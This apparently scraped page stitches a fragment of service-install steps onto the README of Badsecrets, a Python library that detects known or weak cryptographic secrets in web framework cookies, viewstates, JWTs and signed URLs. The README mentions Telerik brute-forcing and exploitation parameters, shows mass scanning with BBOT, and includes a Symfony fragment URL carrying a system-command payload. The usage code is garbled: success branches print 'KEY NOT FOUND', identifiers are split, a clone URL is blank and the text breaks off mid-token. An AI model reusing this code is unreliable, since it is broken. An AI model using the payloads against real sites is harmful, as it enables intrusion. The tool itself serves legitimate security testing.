mkdir /etc/columbus

Copy the config file to /etc/columbus/server.conf.

Set the permission to 0600.

chmod -R 0600 /etc/columbus

Set the owner of the config file:

chown -R columbus-server:columbus /etc/columbus

Install the service file (eg.: /etc/systemd/system/columbus-server.service).

cp columbus-server.service /etc/systemd/system/

Reload systemd:

systemctl daemon-reload

Start columbus:

systemctl start columbus-server

If you want to columbus start automatically:

systemctl enable columbus-server

Badsecrets - A Library For Detecting Known Secrets Across Many Web Frameworks

By: Zion3R

A pure python library for identifying the use of known or very weak cryptographic secrets across a variety of platforms. The project is designed to be both a repository of various "known secrets" (for example, ASP.NET machine keys found in examples in tutorials), and to provide a language-agnostic abstraction layer for identifying their use.

Knowing when a 'bad secret' was used is usually a matter of examining some cryptographic product in which the secret was used: for example, a cookie which is signed with a keyed hashing algorithm. Things can get complicated when you dive into the individual implementation oddities each platform provides, which this library aims to alleviate.

Check out our full blog post on the Black Lantern Security blog!

Inspired by Blacklist3r, with a desire to expand on the supported platforms and remove language and operating system dependencies.

Current Modules

Name Description
ASPNET_Viewstate Checks the viewstate/generator against a list of known machine keys.
Telerik_HashKey Checks patched (2017+) versions of Telerik UI for a known Telerik.Upload.ConfigurationHashKey
Telerik_EncryptionKey Checks patched (2017+) versions of Telerik UI for a known Telerik.Web.UI.DialogParametersEncryptionKey
Flask_SignedCookies Checks for weak Flask cookie signing password. Wrapper for flask-unsign
Peoplesoft_PSToken Can check a peoplesoft PS_TOKEN for a bad/weak signing password
Django_SignedCookies Checks django's session cookies (when in signed_cookie mode) for known django secret_key
Rails_SecretKeyBase Checks Ruby on Rails signed or encrypted session cookies (from multiple major releases) for known secret_key_base
Generic_JWT Checks JWTs for known HMAC secrets or RSA private keys
Jsf_viewstate Checks Both Mojarra and Myfaces implimentations of Java Server Faces (JSF) for use of known or weak secret keys
Symfony_SignedURL Checks symfony "_fragment" urls for known HMAC key. Operates on Full URL, including hash
Express_SignedCookies Checks express.js signed cookies and session cookies for known 'session secret'
Laravel_SignedCookies Checks 'laravel_session' cookies for known laravel 'APP_KEY'


We have a pypi package, so you can just do pip install badsecrets to make use of the library.

Simple Usage

The absolute easiest way to use Badsecrets is by simply running badsecrets after doing a pip install:

pip install badsecrets
badsecrets eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo

This is doing the same thing as the example shown below.


To use the examples, after doing the pip install just git clone the repo and cd into the badsecrets directory:

git clone
cd badsecrets

The commands in the example section below assume you are in this directory.

If you are using the Badsecrets BBOT module, you don't need to do anything else - BBOT will install the package for you.

Bad secrets includes an example CLI for convenience when manually checking secrets. It also has a URL mode, which will connect to a target and attempt to carve for cryptographic products and check any it finds against all modules.

  • Basic usage - checking a crytographic product for a known secret (against all modules):
python ./badsecrets/examples/ eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
  • URL Mode - Connecting to a target and carving for a cryptographic product, and if found checking it for known secrets (against all modules):
python ./badsecrets/examples/ --url

You can also set a custom user-agent with --user-agent "user-agent string" or a proxy with --proxy in this mode.

Example output:

command line interface *********************** Known Secret Found! Detecting Module: Generic_JWT Secret: 1234 Details: {'Issuer': 'Issuer', 'Username': 'BadSecrets', 'exp': 1593133483, 'iat': 1466903083, 'jwt_headers': {'alg': 'HS256'}} ***********************" dir="auto">
$ python ./badsecrets/examples/ eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
badsecrets - example command line interface

Known Secret Found!

Detecting Module: Generic_JWT

Secret: 1234
Details: {'Issuer': 'Issuer', 'Username': 'BadSecrets', 'exp': 1593133483, 'iat': 1466903083, 'jwt_headers': {'alg': 'HS256'}}

Bad secrets includes a fully functional CLI example which replicates the functionality of blacklist3r in python badsecrets/examples/blacklist3r.

python ./badsecrets/examples/ --url http://vulnerablesite/vulnerablepage.aspx
python ./badsecrets/examples/ --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE

Fully functional CLI example for identifying known Telerik Hash keys and Encryption keys for Post-2017 versions (those patched for CVE-2017-9248), and brute-forcing version / generating exploitation DialogParameters values.

python ./badsecrets/examples/ --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx

Optionally include ASP.NET MachineKeys with --machine-keys (Will SIGNIFICANTLY increase brute-forcing time)

Brute-force detection of Symfony known secret key when "_fragment" URLs are enabled, even when no example URL containing a hash can be located. Relevent Blog Post.

python ./badsecrets/examples/ --url https://localhost/

BBOT Module

One of the best ways to use Badsecrets, especially for the ASPNET_Viewstate and Jsf_viewstate modules is with the Badsecrets BBOT module. This will allow you to easily check across thousands of systems in conjunction with subdomain enummeration.

bbot -f subdomain-enum -m badsecrets -t evil.corp

Basic library usage


See if a token or other cryptographic product was produced with a known key

from badsecrets import modules_loaded

Django_SignedCookies = modules_loaded["django_signedcookies"]
ASPNET_Viewstate = modules_loaded["aspnet_viewstate"]
Flask_SignedCookies = modules_loaded["flask_signedcookies"]
Peoplesoft_PSToken = modules_loaded["peoplesoft_pstoken"]
Telerik_HashKey = modules_loaded["telerik_hashkey"]
Telerik_EncryptionKey = modules_loaded["telerik_encryptionkey"]
Rails_SecretKeyBase = modules_loaded["rails_secretkeybase"]
Generic_JWT = modules_loaded["generic_jwt"]
Jsf_viewstate = modules_loaded["jsf_viewstate"]
Symfony_SignedURL = modules_loaded["symfony_signedurl"]
Express_SignedCookies = modules_loaded["express_signedcookies"]
Laravel_SignedCookies = modules_loaded["laravel_signedcookies"]

x = ASPNET_Viewstate()
r = x.check_secret("AgF5WuyVO11CsYJ1K5rjyuLXqUGCITSOapG1cYNiriYQ6VTKochMpn8ws4eJRvft81nQIA==","EDD8C9AE")
if r:
print("KEY NOT FOUND :(")

x = Telerik_HashKey()
r = x.check_secret("vpwClvnLODIx9te2vO%2F4e06KzbKkjtwmNnMx09D1Dmau0dPliYzgpqB9MnEqhPNe3fWemQyH25eLULJi8KiYHXeHvjfS1TZAL2o5Gku1gJbLuqusRXZQYTNlU2Aq4twXO0o0CgVUTfknU89iw0ceyaKjSteOhxGvaE3VEDfiKDd8%2B9j9vD3qso0mLMqn%2Btxirc%2FkIq5oBbzOCgMrJjkaPMa2SJpc5QI2amffBJ%2BsAN25VH%2BwabEJXrjRy%2B8NlYCoUQQKrI%2BEzRSdBsiMOxQTD4vz2TCjSKrK5JEeFMTyE7J39MhXFG38Bq%2FZMDO%2FETHHdsBtTTkqzJ2odVArcOzrce3Kt2%2FqgTUPW%2BCjFtkSNmh%2FzlB9BhbxB1kJt1NkNsjywvP9j7PvNoOBJsa8OwpEyrPTT3Gm%2BfhDwtjvwpvN7l7oIfbcERGExAFrAMENOOt4WGlYhF%2F8c9NcDv0Bv3YJrJoGq0rRurXSh9kcwum9nB%2FGWcjPikqTDm6p3Z48hEnQCVuJNkwJwIKEsYxJqCL95IEdX3PzR81zf36uXPlEa3YdeAgM1RD8YGlwlIXnrLhvMbRvQW0W9eoPzE%2FjP68JGUIZc1TwTQusIWjnuVubFTEUMDLfDNk12tMwM9mfnwT8lWFTMjv9pF70W5OtO7gVN%2BOmCxqAuQmScRVExNds%2FF%2FPli4oxRKfgI7FhAaC%2Fu1DopZ6vvBdUq1pBQE66fQ9SnxRTmIClCpULUhNO90ULTpUi9ga2UtBCTzI8z6Sb6qyQ52NopNZMFdrn9orzdP8 oqFeyYpF%2BQEtbp%2F5AMENkFkWUxHZn8NoSlO8P6G6ubSyDdY4QJPaFS4FxNhhm85WlZC9xfEZ1AGSSBOu9JJVYiKxXnL1yYLqrlWp5mfBHZeUBwEa%2FMjGxZEVYDhXo4PiU0jxN7fYmjaobp3DSgA5H3BcFuNG5d8CUnOlQcEie5b%2BUHOpI9zAk7qcuEUXbaZ5Mvh0t2jXCRALRKYDyBdbHlWAFo10dTIM6L3aSTM5uEz9%2FalXLXoWlMo7dTDpuO5bBfTq7YkoPExL3g3JJX47UhuLq85i3%2Bzxfvd7r%2Fmid69kbD3PnX%2Bj0QxaiShhyOZg6jl1HMeRRXvZap3FPCIfxbCf7j2TRqB5gYefBIIdGYjrdiL6HS8SbjXcROMwh2Fxnt505X4jmkmDcGmneU3z%2B84TSSFewcSpxGEGvHVkkU4OaT6vyFwsxCmdrR187tQZ7gn3ZkAiTps%2FfOPcL5QWXja06Z%2FHT3zboq6Hj9v9NBHzpC1eAK0YN8r4V2UMI3P0%2FsIPQYXhovoeLjJwq6snKZTX37ulE1mbS1uOY%2BZrvFYbLN5DdNL%2B%2Bl%2F%2BcWIpc0RSYBLo19xHpKeoeLjU2sxaYzK%2B92D4zKANdPPvsHPqJD1Y%2FBwCL%2FfZKaJfRK9Bj09ez1Z1ixTEKjIRCwuxijnJGq33faZchbwpMPpTfv43jEriGwXwoqOo9Mbj9ggPAil7O81XZxNT4vv4RoxXTN93V100rt3ClXauL%2BlNID%2BseN2CEZZqnygpTDf2an%2FVsmJGJJcc0goW3l43mhx2U79zeuT94cFPGpvITEbMtjmuNsUbOBuw6nqm5rAs%2FxjIsDRqfQxGQWfS0kuwuU6RRmiME2Ps0NrBENIbZzcbgw6%2BRIwClWkvEG%2BK%2FPdcAdfmRkAPWUNadxnhjeU2jNnzI1yYNIOhziUBPxgFEcAT45E7rWvf8gh T08HZvphzytPmD%2FxuvJaDdRgb6a30TjSpa7i%2BEHkIMxM5eH1kiwhN6xkTcBsJ87epGdFRWKhTGKYwCbaYid1nRs7%2BvQEU7MRYghok8KMTueELipohm3otuKo8V4a7w4TgTSBvPE%2BLPLJRwhM8KcjGlcpzF1NowRo6zeJJhbdPpouUH2NJzDcp7P4uUuUB9Cxt9B986My6zDnz1eyBvRMzj7TABfmfPFPoY3RfzBUzDm%2FA9lOGsM6d9WZj2CH0WxqiLDGmP1Ts9DWX%2FsYyqEGK5R1Xpnp7kRIarPtYliecp50ZIH6nqSkoCBllMCCE6JN%2BdoXobTpulALdmQV0%2Bppv%2FAjzIJrTHgX7jwRGEAeRgAxTomtemmIaH5NtV7xt8XS%2BqwghdJl1D06%2FWhpMtJ1%2FoQGoJ0%2F7ChYyefyAfsiQNWsO66UNVyl71RVPwATnbRO5K5mtxn0M2wuXXpAARNh6pQTcVX%2FTJ4jmosyKwhI6I870NEOsSaWlKVyOdb97C3Bt0pvzq8BagV5FMsNtJKmqIIM0HRkMkalIyfow9iS%2B5xGN5eKM8NE4E6hO4CvmpG%2BH2xFHTSNzloV0FjLdDmj5UfMjhUuEb3rkKK1bGAVaaherp6Ai6N4YJQzh%2FDdpo6al95EZN2OYolzxitgDgsWVGhMvddyQTwnRqRY04hdVJTwdhi4TiCPbLJ1Wcty2ozy6VDs4w77EOAQ5JnxUmDVPA3vXmADJZR0hIJEsuxXfYg%2BRIdV4fzGunV4%2B9jpiyM9G11iiesURK82o%2BdcG7FaCkkun2K2bvD6qGcL61uhoxNeLVpAxjrRjaEBrXsexZ9rExpMlFD8e3NM%2B0K0LQJvdEvpWYS5UTG9cAbNAzBs%3DpDsPXFGf2lEMcyGaK1ouARHUfqU0fzkeVwjXU9ORI%2Fs%3D")
if r:
print(r)< br/>else:
print("KEY NOT FOUND :(")

x = Flask_SignedCookies()
r = x.check_secret("eyJoZWxsbyI6IndvcmxkIn0.XDtqeQ.1qsBdjyRJLokwRzJdzXMVCSyRTA")
if r:
print("KEY NOT FOUND :(")

x = Peoplesoft_PSToken()
if r:
print("KEY NOT FOUND :(")

x = Django_SignedCookies()
r = x.check_secret(".eJxVjLsOAiEURP-F2hAuL8HSfr-BAPciq4ZNlt3K-O9KsoU2U8w5My8W4r7VsHdaw4zswoCdfrsU84PaAHiP7bbwvLRtnRMfCj9o59OC9Lwe7t9Bjb2OtbMkAEGQtQjekykmJy9JZIW-6CgUaCGsA6eSyV65s1Qya_xGKZrY-wPVYjdw:1ojOrE:bfOktjgLlUykwCIRI pvaTZRQMM3-UypscEN57ECtXis")
if r:
print("KEY NOT FOUND :(")

x = Rails_SecretKeyBase()
r = x.check_secret("dUEvRldLekFNcklGZ3ZSbU1XaHJ0ZGxsLzhYTHlNTW43T3BVN05kZXE3WUhQOVVKbVA3Rm5WaSs5eG5QQ1VIRVBzeDFNTnNpZ0xCM1FKbzFZTEJISzhaNzFmVGYzME0waDFURVpCYm5TQlJFRmRFclYzNUZhR3VuN29PMmlkVHBrRi8wb3AwZWgvWmxObkFOYnpkeHR1YWpWZ3lnN0Y4ZW9xSk9LNVlQd0U4MmFsbWtLZUI5VzkzRkM4YXBFWXBWLS15L00xME1nVFp2ZTlmUWcxZVlpelpnPT0=--7efe7919a5210cfd1ac4c6228e3ff82c0600d841")
if r:
print("KEY NOT FOUND :(")

x = Generic_JWT()
r = x.check_secret("eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo")
if r:
print("KEY NOT FOUND :(")

x = Telerik_Encrypt ionKey()
r = x.check_secret("owOnMokk%2F4N7IMo6gznRP56OYIT34dZ1Bh0KBbXlFgztgiNNEBYrgWRYDBkDlX8BIFYBcBztC3NMwoT%2FtNF%2Ff2nCsA37ORIgfBem1foENqumZvmcTpQuoiXXbMWW8oDjs270y6LDAmHhCRsl4Itox4NSBwDgMIOsoMhNrMigV7o7jlgU16L3ezISSmVqFektKmu9qATIXme63u4IKk9UL%2BGP%2Fk3NPv9MsTEVH1wMEf4MApH5KfWBX96TRIc9nlp3IE5BEWNMvI1Gd%2BWXbY5cSY%2Buey2mXQ%2BAFuXAernruJDm%2BxK8ZZ09TNsn5UREutvNtFRrePA8tz3r7p14yG756E0vrU7uBz5TQlTPNUeN3shdxlMK5Qzw1EqxRZmjhaRpMN0YZgmjIpzFgrTnT0%2Bo0f6keaL8Z9TY8vJN8%2BEUPoq%2F7AJiHKm1C8GNc3woVzs5mJKZxMUP398HwGTDv9KSwwkSpHeXFsZofbaWyG0WuNldHNzM%2FgyWMsnGxY6S086%2F477xEQkWdWG5UE%2FowesockebyTTEn3%2B%2FqiVy%2FIOxXvMpvrLel5nVY%2FSouHp5n2URRyRsfo%2B%2BOXJZo7yxKQoYBSSkmxdehJqKJmbgxNp5Ew8m89xAS5g99Hzzg382%2BxFp8yoDVZMOiTEuw0J%2B4G6KizqRW9cis%2FELd0aDE1V7TUuJnFrX%2BlCLOiv100tKpeJ0ePMOYrmvSn0wx7JhswNuj%2BgdKqvCnMSLakGWiOHxu5m9Qqdm3s5sk7nsaxMkh8IqV%2BSzB9A2K1kYEUlY40II1Wun67OSdLlYfdCFQk4ED0N%2BV4kES%2F1xpGiaPhxjboFiiV%2BkvCyJfkuotYuN%2B42CqF yAyepXPA%2BR5jVSThT6OIN2n1UahUnrD%2BwKKGMA9QpVPTSiGLen2KSnJtXISbrl2%2BA2AnQNH%2BMEwYVNjseM0%2BAosbgVfNde2ukMyugo%2FRfrRM27cbdVlE0ms0uXhlgKAYJ2ZN54w1tPWhpGxvZtB0keWpZan0YPh8CBgzsAIMa04HMYLCtgUTqxKqANoKXSy7VIJUzg3fl%2F2WUELjpXK9gRcgexNWDNB1E0rHd9PUo0PvpB4fxSrRpb1LRryipqsuoJ8mrpOVrVMvjracBvtoykK3GrN%2FDUlXkSG%2FAeBQN7HwDJ9QPi3AtEOohp78Op3nmbItXo7IJUSjzBNzUYR8YPj6Ud7Fje9LZSwMBngvgx%2BOKy6HsV4ofOAU2%2FK1%2BfxI0KkCeoSso9NJHWgBD7ijfXUa1Hrc%2FuNU3mTlSSVp3VStQrJbQCkr4paaHYWeeO4pRZCDSBNUzs9qq3TDePwpEQc4QROrw5htdniRk26lFIFm%2Fzk2nC77Pg%2BrkRC1W%2BlRv0lyXsmXVBCe8F1szpWXHCxHNAJwKH%2FBb%2BV1k6AXFXVWPW5vADbXUvRu0s6KLaqu6a0KCB7dt3K2Ni%2FI6O%2FmISYXzknbMrwwakNfajbRF2ibodgR9R9xvoCoCXa3ka7%2Fejr%2BmsZ2HvPKUAffd2fNIWCQrejfpuIoOWiYx6ufN8E41HetCbYfvsI6JQfPOEdOYWI2px%2BLdfO3Nybq99%2BRSQOhjNZakBP54ozlCUfwgpLOmTBwsswZexv1RK5MIi8%2FWtjlJ%2FKjkYxdkFUlwggGS2xDwzcyl2%2FakNCQ5YmxjU8cRY7jZQRMo%2F8uTw5qa2MNZPaQGI18uRgr0i%2FTX3t57fJYCpMLXSaUKIdO7O%2FCQhIyGTS6KrPN%2B3%2FgUb%2BPQ1viGhpnWfGEYF9vhIlK57z8G8G82UQ3DpttD7M 8mQ0KsmCOq75ECx9CWrWGk51vADlm%2BLEZ5oWjVMs%2FThki40B7tL7gzFrBuQksWXYeubMzZfFo4ZQ49di4wupHG5kRsyL2fJUzgpaLDP%2BSe6%2FjCnc52C7lZ3Ls0cHJVf9HRwDNXWM%2B4h8donNy5637QWK%2BV7mlH%2FL4xBZCfU9l6sIz%2FWHMtRaQprEem6a%2FRwPRDBiP65I2EwZLKGY8I%2F1uXJncwC8egLu82JY9maweI0VmJSmRcTf0evxqqe7vc9MqpsUlpSVNh4bFnxVIo5E4PGX70kVaTFe0vu1YdGKmFX5PLvkmWIf%2FnwfgPMqYsa0%2F09trboJ5LGDEQRXSBb7ldG%2FwLdOiqocYKAb91SMpn1fXVPBgkPM27QZxHnSAmWVbJR2%2FIhO%2BIVNzkgFAJlptiEPPPTxuBh%2BTT7CaIQE3oZbbJeQKvRkrt4bawTCOzciU%2F1zFGxubTJTSyInjQ8%2F1tVo7KjnxPKqGSfwZQN%2FeWL6R%2FpvCb%2BE6D4pdyczoJRUWsSNXNnA7QrdjgGNWhyOMiKvkDf3RD4mrXbul18WYVTsLyp0hvQsbdwBWOh7VlwfrWdy%2BklsttFi%2B%2BadKR7DbwjLTcxvdNpTx1WJhXROR8jwW26VEYSXPVqWnYvfyZo4DojKHMSDMbAakbuSJdkGP1d5w0AYbKlAcVQOqp9hbAvfwwLy4ErdIsOg0YEeCcnQVRAXwaCI9JvWWmM%2FzYJzE3X45A6lU9Pe7TAbft810MYh7lmV6Keb5HI6qXFiD%2B8khBZqi%2FsK6485k0a86aWLxOb4Eqnoc41x%2BYPv5CWfvP6cebsENo%3D%2BIUg0f64C4y77N4FZ6C82m5wMpvDQIHqx0ZFIHLhwMg%3D")
if r:
print("KEY NOT FOUND :(" )

x = Jsf_viewstate()
r = x.check_secret("wHo0wmLu5ceItIi+I7XkEi1GAb4h12WZ894pA+Z4OH7bco2jXEy1RSCWwjtJcZNbWPcvPqL5zzfl03DoeMZfGGX7a9PSv+fUT8MAeKNouAGj1dZuO8srXt8xZIGg+wPCWWCzcX6IhWOtgWUwiXeSojCDTKXklsYt+kzlVbk5wOsXvb2lTJoO0Q==")
if r:
print("KEY NOT FOUND :(")

x = Symfony_SignedURL()
r = x.check_secret("https://localhost/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull&_hash=Xnsvx/yLVQaimEd1CfepgH0rEXr422JnRSn/uaCE3gs=")
if r:
print("KEY NOT FOUND :(")

x = Express_SignedCookies()
r = x.check_secret("s%3A8FnPwdeM9kdGTZlWvdaVtQ0S1BCOhY5G.qys7H2oGSLLdRsEq7sqh7btOohHsaRKqyjV4LiVnBvc")
if r:
print("KEY NOT FOUND :(")

x = Laravel_SignedCo okies()
r = x.check_secret("eyJpdiI6IlhlNTZ2UjZUQWZKVHdIcG9nZFkwcGc9PSIsInZhbHVlIjoiRlUvY2grU1F1b01lSXdveXJ0T3N1WGJqeVVmZlNRQjNVOWxiSzljL1Z3RDhqYUdDbjZxMU9oSThWRzExT0YvUmthVzVKRE9kL0RvTEw1cFRhQkphOGw4S2loV1ZrMkkwTHd4am9sZkJQd2VCZ3R0VlFSeFo3ay9wTlBMb3lLSG8iLCJtYWMiOiJkMmU3M2ExNDc2NTc5YjAwMGMwMTdkYTQ1NThkMjRkNTY2YTE4OTg2MzY5MzE5NGZmOTM4YWVjOGZmMWU4NTk2IiwidGFnIjoiIn0%3D")
if r:
print("KEY NOT FOUND :(")


An additional layer of abstraction above check_secret, which accepts a python requests.response object or a string

import requests
from badsecrets import modules_loaded
Telerik_HashKey = modules_loaded["telerik_hashkey"]

x = Telerik_HashKey()

res = requests.get(f"")
r_list = x.carve(requests_response=res)

telerik_dialogparameters_sample = """
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDialogOpener, {"_dialogDefinitions":{"ImageManager":{"SerializedParameters":"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","Width":"770px","Height":"588px","Title":"Image Manager"}

r_list = x.carve(body=telerik_dialogparameters_sample)

Check all modules at once

from badsecrets.base import check_all_modules

tests = [
"vpwClvnLODIx9te2vO%2F4e06KzbKkjtwmNnMx09D1Dmau0dPliYzgpqB9MnEqhPNe3fWemQyH25eLULJi8KiYHXeHvjfS1TZAL2o5Gku1gJbLuqusRXZQYTNlU2Aq4twXO0o0CgVUTfknU89iw0ceyaKjSteOhxGvaE3VEDfiKDd8%2B9j9vD3qso0mLMqn%2Btxirc%2FkIq5oBbzOCgMrJjkaPMa2SJpc5QI2amffBJ%2BsAN25VH%2BwabEJXrjRy%2B8NlYCoUQQKrI%2BEzRSdBsiMOxQTD4vz2TCjSKrK5JEeFMTyE7J39MhXFG38Bq%2FZMDO%2FETHHdsBtTTkqzJ2odVArcOzrce3Kt2%2FqgTUPW%2BCjFtkSNmh%2FzlB9BhbxB1kJt1NkNsjywvP9j7PvNoOBJsa8OwpEyrPTT3Gm%2BfhDwtjvwpvN7l7oIfbcERGExAFrAMENOOt4WGlYhF%2F8c9NcDv0Bv3YJrJoGq0rRurXSh9kcwum9nB%2FGWcjPikqTDm6p3Z48hEnQCVuJNkwJwIKEsYxJqCL95IEdX3PzR81zf36uXPlEa3YdeAgM1RD8YGlwlIXnrLhvMbRvQW0W9eoPzE%2FjP68JGUIZc1TwTQusIWjnuVubFTEUMDLfDNk12tMwM9mfnwT8lWFTMjv9pF70W5OtO7gVN%2BOmCxqAuQmScRVExNd 